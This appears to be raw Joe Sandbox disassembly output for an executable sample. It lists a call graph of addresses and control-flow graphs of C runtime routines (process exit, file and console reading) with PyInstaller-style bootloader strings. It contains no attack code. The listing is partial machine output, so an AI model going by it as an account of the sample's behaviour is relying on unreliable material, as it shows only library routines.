17276->17279 17276->17282 17277->17280 17278->17280 17279->17280 17281 f5e0e6 39 API calls 17280->17281 17280->17282 17281->17282 17282->16991 17286 f5ce3c 17283->17286 17285 f5ce03 17285->17216 17287 f5ce5e _mbstowcs 17286->17287 17288 f5e619 __dosmaperr 14 API calls 17287->17288 17291 f5ce95 17287->17291 17289 f5ce8a 17288->17289 17290 f63b33 _mbstowcs 25 API calls 17289->17290 17290->17291 17291->17285 17293 f5ca37 17292->17293 17294 f5ca3c 17292->17294 17295 f5e619 __dosmaperr 14 API calls 17293->17295 17300 f65c0b 17294->17300 17295->17294 17298 f5e619 __dosmaperr 14 API calls 17299 f5ca6e 17298->17299 17299->16991 17301 f65c26 17300->17301 17304 f63077 17301->17304 17305 f5e044 25 API calls 17304->17305 17309 f63089 17305->17309 17306 f630c2 17307 f5c80e _mbstowcs 37 API calls 17306->17307 17314 f630ce 17307->17314 17308 f6309e 17310 f5e619 __dosmaperr 14 API calls 17308->17310 17309->17306 17309->17308 17321 f5ca5a 17309->17321 17311 f630a3 17310->17311 17312 f63b33 _mbstowcs 25 API calls 17311->17312 17312->17321 17315 f630fd 17314->17315 17322 f638f9 17314->17322 17318 f63167 17315->17318 17328 f638a2 17315->17328 17316 f638a2 25 API calls 17319 f6322d 17316->17319 17318->17316 17320 f5e619 __dosmaperr 14 API calls 17319->17320 17319->17321 17320->17321 17321->17298 17321->17299 17323 f63936 17322->17323 17324 f63906 17322->17324 17326 f69679 __wsopen_s 37 API calls 17323->17326 17325 f63915 _mbstowcs 17324->17325 17327 f6b373 40 API calls 17324->17327 17325->17314 17326->17325 17327->17325 17329 f638c7 17328->17329 17330 f638b3 17328->17330 17329->17318 17330->17329 17331 f5e619 __dosmaperr 14 API calls 17330->17331 17332 f638bc 17331->17332 17333 f63b33 _mbstowcs 25 API calls 17332->17333 17333->17329 17335 f5da83 17334->17335 17336 f5dab8 17335->17336 17372 f65dbb 17335->17372 17336->17258 17339 f5deb7 17338->17339 17340 f5db91 26 API calls 17339->17340 17341 f5dec9 17340->17341 17341->17258 17343 f5de4c 17342->17343 17344 f5e619 __dosmaperr 14 API calls 17343->17344 17347 f5de60 17343->17347 17345 f5de55 17344->17345 17346 f63b33 _mbstowcs 25 API calls 17345->17346 17346->17347 17347->17258 17349 f5dba4 17348->17349 17350 f5dbbf 17349->17350 17352 f5dbd6 17349->17352 17351 f5e619 __dosmaperr 14 API calls 17350->17351 17353 f5dbc4 17351->17353 17356 f5dbcf 17352->17356 17407 f5c2e8 17352->17407 17354 f63b33 _mbstowcs 25 API calls 17353->17354 17354->17356 17356->17258 17358 f5d7c9 17357->17358 17359 f5c2e8 15 API calls 17358->17359 17360 f5d806 17359->17360 17420 f66eb3 17360->17420 17362 f5d87e 17362->17258 17364 f5db91 26 API calls 17363->17364 17365 f5df00 17364->17365 17365->17258 17370 f5e157 17366->17370 17371 f5e103 17366->17371 17367 f596fa _ValidateLocalCookies 5 API calls 17369 f5e187 17367->17369 17368 f65dbb 39 API calls 17368->17371 17369->17260 17370->17367 17371->17368 17371->17370 17373 f65dcb 17372->17373 17374 f65df5 17373->17374 17375 f65e09 17373->17375 17387 f65dd0 17373->17387 17376 f5e619 __dosmaperr 14 API calls 17374->17376 17377 f5c80e _mbstowcs 37 API calls 17375->17377 17378 f65dfa 17376->17378 17379 f65e14 17377->17379 17380 f63b33 _mbstowcs 25 API calls 17378->17380 17381 f65e24 17379->17381 17382 f65e50 17379->17382 17380->17387 17397 f6b522 17381->17397 17383 f65e58 17382->17383 17401 f680d7 17382->17401 17392 f65e66 __fread_nolock 17383->17392 17396 f65e9d __fread_nolock 17383->17396 17387->17336 17388 f65ecd 17389 f65ee1 GetLastError 17388->17389 17388->17392 17389->17392 17389->17396 17390 f5e619 __dosmaperr 14 API calls 17390->17387 17391 f5e619 __dosmaperr 14 API calls 17394 f65f07 17391->17394 17392->17387 17392->17390 17393 f5e619 __dosmaperr 14 API calls 17393->17387 17395 f63b33 _mbstowcs 25 API calls 17394->17395 17395->17387 17396->17387 17396->17391 17398 f6b53d 17397->17398 17399 f65e39 17397->17399 17398->17399 17404 f6b5cd 17398->17404 17399->17387 17399->17393 17402 f680ee WideCharToMultiByte 17401->17402 17402->17388 17405 f5e619 __dosmaperr 14 API calls 17404->17405 17406 f6b5e1 17405->17406 17406->17399 17408 f5c2fd 17407->17408 17409 f5c30c 17407->17409 17410 f5e619 __dosmaperr 14 API calls 17408->17410 17411 f5c302 17409->17411 17412 f65ba2 __fread_nolock 15 API calls 17409->17412 17410->17411 17411->17356 17413 f5c333 17412->17413 17414 f5c34a 17413->17414 17417 f5c8ab 17413->17417 17416 f63b77 _free 14 API calls 17414->17416 17416->17411 17418 f63b77 _free 14 API calls 17417->17418 17419 f5c8ba 17418->17419 17419->17414 17421 f66ec3 17420->17421 17422 f66ed9 17420->17422 17423 f5e619 __dosmaperr 14 API calls 17421->17423 17422->17421 17426 f66eeb 17422->17426 17424 f66ec8 17423->17424 17425 f63b33 _mbstowcs 25 API calls 17424->17425 17436 f66ed2 17425->17436 17427 f66f27 17426->17427 17428 f66f56 17426->17428 17441 f66d57 17427->17441 17429 f66f7f 17428->17429 17430 f66f84 17428->17430 17433 f66fea 17429->17433 17434 f66fa8 17429->17434 17449 f66605 17430->17449 17477 f66914 17433->17477 17437 f66fcc 17434->17437 17438 f66fad 17434->17438 17436->17362 17470 f66b04 17437->17470 17460 f66c8d 17438->17460 17442 f66d6d 17441->17442 17443 f66d78 17441->17443 17442->17436 17485 f62fa8 17443->17485 17446 f66ddd 17446->17436 17447 f63b43 __wsopen_s 11 API calls 17448 f66deb 17447->17448 17450 f66617 17449->17450 17451 f5c80e _mbstowcs 37 API calls 17450->17451 17452 f6662b 17451->17452 17453 f66647 17452->17453 17454 f66633 17452->17454 17457 f66914 39 API calls 17453->17457 17459 f66642 __alldvrm __fread_nolock _strrchr 17453->17459 17455 f5e619 __dosmaperr 14 API calls 17454->17455 17456 f66638 17455->17456 17458 f63b33 _mbstowcs 25 API calls 17456->17458 17457->17459 17458->17459 17459->17436 17494 f6bbe8 17460->17494 17471 f6bbe8 27 API calls 17470->17471 17472 f66b31 17471->17472 17473 f6b666 25 API calls 17472->17473 17474 f66b6f 17473->17474 17475 f66b76 17474->17475 17476 f66b95 37 API calls 17474->17476 17475->17436 17476->17475 17478 f6692c 17477->17478 17479 f6bbe8 27 API calls 17478->17479 17480 f66945 17479->17480 17481 f6b666 25 API calls 17480->17481 17482 f66990 17481->17482 17483 f66997 17482->17483 17484 f669bc 37 API calls 17482->17484 17483->17436 17484->17483 17486 f62fc3 17485->17486 17487 f62fb5 17485->17487 17488 f5e619 __dosmaperr 14 API calls 17486->17488 17487->17486 17492 f62fda 17487->17492 17489 f62fcb 17488->17489 17490 f63b33 _mbstowcs 25 API calls 17489->17490 17491 f62fd5 17490->17491 17491->17446 17491->17447 17492->17491 17493 f5e619 __dosmaperr 14 API calls 17492->17493 17493->17489 17495 f6bc1c 17494->17495 17496 f62e8c 25 API calls 17495->17496 17497 f6bc85 17496->17497 17498 f6bcb1 17497->17498 17504 f6bcde 17497->17504 17499 f62fa8 25 API calls 17498->17499 17500 f6bcce 17499->17500 17503 f62fa8 25 API calls 17503->17500 17508 f6d081 17504->17508 17509 f6bd19 17504->17509 17508->17503 17511 f6f780 21 API calls 17509->17511 17512 f6bd9f 17511->17512 17575 f56a98 17574->17575 17576 f56a3a WideCharToMultiByte 17574->17576 17577 f56a9c WideCharToMultiByte 17575->17577 17578 f56a56 17576->17578 17579 f56a6d 17576->17579 17580 f56ad0 17577->17580 17581 f56ab9 17577->17581 17582 f52290 51 API calls 17578->17582 17579->17577 17586 f56a81 17579->17586 17580->16940 17583 f52290 51 API calls 17581->17583 17584 f56a65 17582->17584 17585 f56ac8 17583->17585 17584->16940 17585->16940 17587 f52290 51 API calls 17586->17587 17588 f56a90 17587->17588 17588->16940 22356 f6611b 22357 f66126 22356->22357 22358 f66136 22356->22358 22362 f6613c 22357->22362 22361 f63b77 _free 14 API calls 22361->22358 22363 f66151 22362->22363 22364 f66157 22362->22364 22365 f63b77 _free 14 API calls 22363->22365 22366 f63b77 _free 14 API calls 22364->22366 22365->22364 22367 f66163 22366->22367 22368 f63b77 _free 14 API calls 22367->22368 22369 f6616e 22368->22369 22370 f63b77 _free 14 API calls 22369->22370 22371 f66179 22370->22371 22372 f63b77 _free 14 API calls 22371->22372 22373 f66184 22372->22373 22374 f63b77 _free 14 API calls 22373->22374 22375 f6618f 22374->22375 22376 f63b77 _free 14 API calls 22375->22376 22377 f6619a 22376->22377 22378 f63b77 _free 14 API calls 22377->22378 22379 f661a5 22378->22379 22380 f63b77 _free 14 API calls 22379->22380 22381 f661b0 22380->22381 22382 f63b77 _free 14 API calls 22381->22382 22383 f661be 22382->22383 22388 f65f68 22383->22388 22389 f65f74 ___scrt_is_nonwritable_in_current_image 22388->22389 22404 f68793 EnterCriticalSection 22389->22404 22391 f65fa8 22405 f65fc7 22391->22405 22393 f65f7e 22393->22391 22395 f63b77 _free 14 API calls 22393->22395 22395->22391 22396 f65fd3 22397 f65fdf ___scrt_is_nonwritable_in_current_image 22396->22397 22409 f68793 EnterCriticalSection 22397->22409 22399 f65fe9 22400 f66209 __dosmaperr 14 API calls 22399->22400 22401 f65ffc 22400->22401 22410 f6601c 22401->22410 22404->22393 22408 f687db LeaveCriticalSection 22405->22408 22407 f65fb5 22407->22396 22408->22407 22409->22399 22413 f687db LeaveCriticalSection 22410->22413 22412 f6600a 22412->22361 22413->22412 17598 f59800 17599 f5980c ___scrt_is_nonwritable_in_current_image 17598->17599 17624 f59bf9 17599->17624 17601 f59966 17662 f59ee1 IsProcessorFeaturePresent 17601->17662 17602 f59813 17602->17601 17612 f5983d ___scrt_is_nonwritable_in_current_image _mbstowcs ___scrt_release_startup_lock 17602->17612 17604 f5996d 17642 f628a3 17604->17642 17607 f62867 _mbstowcs 23 API calls 17608 f5997b 17607->17608 17609 f5985c 17610 f598dd 17632 f59ffc 17610->17632 17612->17609 17612->17610 17645 f6287d 17612->17645 17613 f598e3 17636 f51000 17613->17636 17625 f59c02 17624->17625 17666 f5a185 IsProcessorFeaturePresent 17625->17666 17629 f59c13 17631 f59c17 17629->17631 17676 f5af3d 17629->17676 17631->17602 17738 f5a8f0 17632->17738 17635 f5a022 17635->17613 17637 f51006 17636->17637 17740 f566b0 17637->17740 17639 f51015 17753 f52f30 17639->17753 17643 f62741 _mbstowcs 23 API calls 17642->17643 17644 f59973 17643->17644 17644->17607 17646 f62893 __dosmaperr 17645->17646 17647 f62eeb ___scrt_is_nonwritable_in_current_image 17645->17647 17646->17610 17648 f66254 _mbstowcs 37 API calls 17647->17648 17649 f62efc 17648->17649 17650 f63002 _mbstowcs 37 API calls 17649->17650 17651 f62f26 GetCurrentProcessId 17650->17651 17651->17610 17663 f59ef7 _mbstowcs __fread_nolock 17662->17663 17664 f59fa2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17663->17664 17665 f59fed _mbstowcs 17664->17665 17665->17604 17667 f59c0e 17666->17667 17668 f5af1e 17667->17668 17682 f5b311 17668->17682 17672 f5af2f 17673 f5af3a 17672->17673 17696 f5b34d 17672->17696 17673->17629 17675 f5af27 17675->17629 17677 f5af46 17676->17677 17678 f5af50 17676->17678 17679 f5b2f6 ___vcrt_uninitialize_ptd 6 API calls 17677->17679 17678->17631 17680 f5af4b 17679->17680 17681 f5b34d ___vcrt_uninitialize_locks DeleteCriticalSection 17680->17681 17681->17678 17683 f5b31a 17682->17683 17685 f5b343 17683->17685 17686 f5af23 17683->17686 17700 f5b575 17683->17700 17687 f5b34d ___vcrt_uninitialize_locks DeleteCriticalSection 17685->17687 17686->17675 17688 f5b2c3 17686->17688 17687->17686 17719 f5b486 17688->17719 17693 f5b2f3 17693->17672 17695 f5b2d8 17695->17672 17697 f5b358 17696->17697 17699 f5b377 17696->17699 17698 f5b362 DeleteCriticalSection 17697->17698 17698->17698 17698->17699 17699->17675 17705 f5b43d 17700->17705 17703 f5b5ad InitializeCriticalSectionAndSpinCount 17704 f5b598 17703->17704 17704->17683 17706 f5b455 17705->17706 17707 f5b478 17705->17707 17706->17707 17711 f5b3a3 17706->17711 17707->17703 17707->17704 17710 f5b46a GetProcAddress 17710->17707 17717 f5b3af ___vcrt_FlsSetValue 17711->17717 17712 f5b423 17712->17707 17712->17710 17713 f5b3c5 LoadLibraryExW 17714 f5b3e3 GetLastError 17713->17714 17715 f5b42a 17713->17715 17714->17717 17715->17712 17716 f5b432 FreeLibrary 17715->17716 17716->17712 17717->17712 17717->17713 17718 f5b405 LoadLibraryExW 17717->17718 17718->17715 17718->17717 17720 f5b43d ___vcrt_FlsSetValue 5 API calls 17719->17720 17721 f5b4a0 17720->17721 17722 f5b4b9 TlsAlloc 17721->17722 17723 f5b2cd 17721->17723 17723->17695 17724 f5b537 17723->17724 17725 f5b43d ___vcrt_FlsSetValue 5 API calls 17724->17725 17726 f5b551 17725->17726 17727 f5b56c TlsSetValue 17726->17727 17728 f5b2e6 17726->17728 17727->17728 17728->17693 17729 f5b2f6 17728->17729 17730 f5b300 17729->17730 17731 f5b306 17729->17731 17733 f5b4c1 17730->17733 17731->17695 17734 f5b43d ___vcrt_FlsSetValue 5 API calls 17733->17734 17735 f5b4db 17734->17735 17736 f5b4f3 TlsFree 17735->17736 17737 f5b4e7 17735->17737 17736->17737 17737->17731 17739 f5a00f GetStartupInfoW 17738->17739 17739->17635 17744 f566c4 17740->17744 17741 f566cd 17741->17639 17742 f567b4 17742->17639 17743 f566f0 WideCharToMultiByte 17743->17744 17746 f56760 17743->17746 17744->17741 17744->17742 17744->17743 17744->17746 17747 f5672b WideCharToMultiByte 17744->17747 17745 f52290 53 API calls 17748 f56782 17745->17748 17746->17745 17747->17744 17747->17746 17749 f567a1 17748->17749 17750 f5e365 ___vcrt_freefls@4 14 API calls 17748->17750 17751 f5e365 ___vcrt_freefls@4 14 API calls 17749->17751 17750->17748 17752 f567a7 17751->17752 17752->17639 17754 f52f3a __wsopen_s 17753->17754 17841 f5efe0 17754->17841 17759 f530a5 17761 f596fa _ValidateLocalCookies 5 API calls 17759->17761 18108 f67d77 17841->18108 17843 f52f69 17844 f51a60 17843->17844 17845 f51a6d 17844->17845 17846 f51a85 17845->17846 18269 f521e0 17845->18269 17846->17759 17848 f534a0 17846->17848 18300 f59710 17848->18300 18109 f67d9e 18108->18109 18110 f67d89 18108->18110 18109->18110 18114 f67dc5 18109->18114 18111 f5e619 __dosmaperr 14 API calls 18110->18111 18112 f67d8e 18111->18112 18113 f63b33 _mbstowcs 25 API calls 18112->18113 18115 f67d99 18113->18115 18118 f67c4c 18114->18118 18115->17843 18119 f67c58 ___scrt_is_nonwritable_in_current_image 18118->18119 18126 f5e52c EnterCriticalSection 18119->18126 18121 f67c66 18127 f67ca7 18121->18127 18126->18121 18139 f5fafd 18127->18139 18140 f5fb15 18139->18140 18141 f5fb3a 18139->18141 18140->18141 18142 f62f81 __fread_nolock 25 API calls 18140->18142 18145 f63ecc 18141->18145 18143 f5fb33 18142->18143 18146 f63ee3 18145->18146 18148 f63ef5 18145->18148 18146->18148 18270 f5221c 18269->18270 18271 f5e312 44 API calls 18270->18271

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 692 f627a5-f627b2 call f6a500 695 f627d4-f627e0 call f627e7 ExitProcess 692->695 696 f627b4-f627c2 GetPEB 692->696 696->695 697 f627c4-f627ce GetCurrentProcess TerminateProcess 696->697 697->695
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,00F627A4,?,?,?,?,?,00F5C00A), ref: 00F627C7
                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00F627A4,?,?,?,?,?,00F5C00A), ref: 00F627CE
                                                                                                                      • ExitProcess.KERNEL32 ref: 00F627E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1703294689-0
                                                                                                                      • Opcode ID: 0b6b6f1089981358f8e89a7c8722e8e47401efdfd1f8d5fa4a1b7ba3537c6626
                                                                                                                      • Instruction ID: ed649b7f3ef905d911cfbafec6c0ba88809bbd567e01d6bedf1300f94c5e6612
                                                                                                                      • Opcode Fuzzy Hash: 0b6b6f1089981358f8e89a7c8722e8e47401efdfd1f8d5fa4a1b7ba3537c6626
                                                                                                                      • Instruction Fuzzy Hash: 4FE04631400548EFCF11AF24CC48D083B68EB00351B004520F80A8A532CB39EE81FB91

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                      • API String ID: 2638373210-4158440160
                                                                                                                      • Opcode ID: abff41bf91693fff641e96be83e4bc90fc6b55b5d6f9cea76ec7c316db1b3975
                                                                                                                      • Instruction ID: 5ecc2a3e2051054b1bfb9eef16c1b2163bd7af2362ac5ce5d6a4da7e54919e3e
                                                                                                                      • Opcode Fuzzy Hash: abff41bf91693fff641e96be83e4bc90fc6b55b5d6f9cea76ec7c316db1b3975
                                                                                                                      • Instruction Fuzzy Hash: 2F51E771A007009BC718DF28DC46A16B7E1BF48322F548A2DFA4EC3691E675E54CEB43

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 59 f644f5-f64505 60 f64507-f6451a call f5e606 call f5e619 59->60 61 f6451f-f64521 59->61 75 f6489e 60->75 63 f64886-f64893 call f5e606 call f5e619 61->63 64 f64527-f6452d 61->64 82 f64899 call f63b33 63->82 64->63 67 f64533-f64559 64->67 67->63 70 f6455f-f64568 67->70 73 f64582-f64584 70->73 74 f6456a-f6457d call f5e606 call f5e619 70->74 78 f64882-f64884 73->78 79 f6458a-f6458d 73->79 74->82 81 f648a1-f648a4 75->81 78->81 79->78 80 f64593-f64597 79->80 80->74 84 f64599-f645b0 80->84 82->75 87 f645b2-f645b5 84->87 88 f64601-f64607 84->88 90 f645b7-f645c0 87->90 91 f645c5-f645cb 87->91 92 f645cd-f645e4 call f5e606 call f5e619 call f63b33 88->92 93 f64609-f64613 88->93 94 f64685-f64695 90->94 91->92 95 f645e9-f645fc 91->95 125 f647b9 92->125 97 f64615-f64617 93->97 98 f6461a-f6461b call f65ba2 93->98 99 f6475a-f64763 call f6b43e 94->99 100 f6469b-f646a7 94->100 95->94 97->98 104 f64620-f64638 call f63b77 * 2 98->104 114 f647d6 99->114 115 f64765-f64777 99->115 100->99 103 f646ad-f646af 100->103 103->99 107 f646b5-f646d9 103->107 129 f64655-f6467e call f64bdd 104->129 130 f6463a-f64650 call f5e619 call f5e606 104->130 107->99 111 f646db-f646f1 107->111 111->99 116 f646f3-f646f5 111->116 118 f647da-f647f2 ReadFile 114->118 115->114 120 f64779-f64788 GetConsoleMode 115->120 116->99 121 f646f7-f6471d 116->121 123 f647f4-f647fa 118->123 124 f6484e-f64859 GetLastError 118->124 120->114 126 f6478a-f6478e 120->126 121->99 128 f6471f-f64735 121->128 123->124 133 f647fc 123->133 131 f64872-f64875 124->131 132 f6485b-f6486d call f5e619 call f5e606 124->132 127 f647bc-f647c6 call f63b77 125->127 126->118 134 f64790-f647aa ReadConsoleW 126->134 127->81 128->99 140 f64737-f64739 128->140 129->94 130->125 137 f647b2-f647b8 call f5e5e3 131->137 138 f6487b-f6487d 131->138 132->125 144 f647ff-f64811 133->144 135 f647ac GetLastError 134->135 136 f647cb-f647d4 134->136 135->137 136->144 137->125 138->127 140->99 147 f6473b-f64755 140->147 144->127 151 f64813-f64817 144->151 147->99 155 f64830-f6483b 151->155 156 f64819-f64829 call f6420f 151->156 158 f64847-f6484c call f64060 155->158 159 f6483d call f64366 155->159 165 f6482c-f6482e 156->165 166 f64842-f64845 158->166 159->166 165->127 166->165
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3907804496
                                                                                                                      • Opcode ID: aea0334473c4d0b6b232e3e03ae3b2abd8ea6ab403e7d246086e65437f25ec74
                                                                                                                      • Instruction ID: a7a0e8eb29fb076b53c19a031dd8d6fd14bd5957a19ae675367737c91044f0fd
                                                                                                                      • Opcode Fuzzy Hash: aea0334473c4d0b6b232e3e03ae3b2abd8ea6ab403e7d246086e65437f25ec74
                                                                                                                      • Instruction Fuzzy Hash: B2C11575E04249AFCF15EFA8CC80BBDBBB0AF4A310F144159E9159B292C734AE41EB21

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 168 f6e4d6-f6e506 call f6e2b2 171 f6e521-f6e52d call f60904 168->171 172 f6e508-f6e513 call f5e606 168->172 178 f6e546-f6e58f call f6e21d 171->178 179 f6e52f-f6e544 call f5e606 call f5e619 171->179 177 f6e515-f6e51c call f5e619 172->177 188 f6e7fb-f6e7ff 177->188 186 f6e591-f6e59a 178->186 187 f6e5fc-f6e605 GetFileType 178->187 179->177 190 f6e5d1-f6e5f7 GetLastError call f5e5e3 186->190 191 f6e59c-f6e5a0 186->191 192 f6e607-f6e638 GetLastError call f5e5e3 CloseHandle 187->192 193 f6e64e-f6e651 187->193 190->177 191->190 197 f6e5a2-f6e5cf call f6e21d 191->197 192->177 207 f6e63e-f6e649 call f5e619 192->207 195 f6e653-f6e658 193->195 196 f6e65a-f6e660 193->196 200 f6e664-f6e6b2 call f6084f 195->200 196->200 201 f6e662 196->201 197->187 197->190 211 f6e6b4-f6e6c0 call f6e42c 200->211 212 f6e6d1-f6e6f9 call f6dfca 200->212 201->200 207->177 211->212 219 f6e6c2 211->219 217 f6e6fe-f6e73f 212->217 218 f6e6fb-f6e6fc 212->218 221 f6e760-f6e76e 217->221 222 f6e741-f6e745 217->222 220 f6e6c4-f6e6cc call f63cca 218->220 219->220 220->188 224 f6e774-f6e778 221->224 225 f6e7f9 221->225 222->221 223 f6e747-f6e75b 222->223 223->221 224->225 227 f6e77a-f6e7ad CloseHandle call f6e21d 224->227 225->188 231 f6e7e1-f6e7f5 227->231 232 f6e7af-f6e7db GetLastError call f5e5e3 call f60a17 227->232 231->225 232->231
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F6E21D: CreateFileW.KERNELBASE(00000000,00000000,?,00F6E57F,?,?,00000000,?,00F6E57F,00000000,0000000C), ref: 00F6E23A
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E5EA
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E5F1
                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00F6E5FD
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E607
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E610
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F6E630
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F6E77D
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E7AF
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E7B6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                      • String ID: H
                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                      • Opcode ID: 431752f102ec7e2622de3b71c8dc9f2c8d2e66beb5f2d40c5df46ba4aa6496fc
                                                                                                                      • Instruction ID: a4914d0f7dfa9b9710d8b369e1f4e1515fb203e412ab33096a17686aa72cbc8c
                                                                                                                      • Opcode Fuzzy Hash: 431752f102ec7e2622de3b71c8dc9f2c8d2e66beb5f2d40c5df46ba4aa6496fc
                                                                                                                      • Instruction Fuzzy Hash: 69A14637A101189FCF19DF68DC51BEE3BA1AB06324F28015DE812EF292DB358D16EB51

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 338 f512a0-f512ab 339 f512e1-f51300 call f5bd15 338->339 340 f512ad-f512c5 call f535c0 338->340 346 f51302-f5131d call f521e0 339->346 347 f5131e-f51333 call f5e380 339->347 340->339 345 f512c7-f512e0 call f52340 340->345 354 f51335-f5134e call f521e0 347->354 355 f51350-f51354 347->355 363 f513cb-f513d0 354->363 356 f51374-f51381 355->356 357 f51356-f5135b call f51040 355->357 360 f513c7 356->360 361 f51383-f51385 356->361 364 f51360-f51365 357->364 360->363 365 f51387 361->365 366 f51398 361->366 368 f513e2-f513e9 363->368 369 f513d2-f513d3 call f5b65c 363->369 364->363 367 f51367-f51372 call f5e365 364->367 370 f51391-f51396 365->370 371 f51389-f5138f 365->371 372 f5139a-f513ac call f5b91e 366->372 367->363 377 f513d8-f513db 369->377 370->372 371->366 371->370 379 f513ae-f513bf 372->379 380 f513ea-f51413 call f521e0 call f5e365 372->380 377->368 379->370 381 f513c1 379->381 380->363 381->360 383 f513c3-f513c5 381->383 383->360 383->361
                                                                                                                      Strings
                                                                                                                      • Failed to extract %s: failed to open archive file!, xrefs: 00F512CF
                                                                                                                      • fseek, xrefs: 00F5130B
                                                                                                                      • fread, xrefs: 00F513F7
                                                                                                                      • Failed to extract %s: failed to read data chunk!, xrefs: 00F513F2
                                                                                                                      • malloc, xrefs: 00F51341
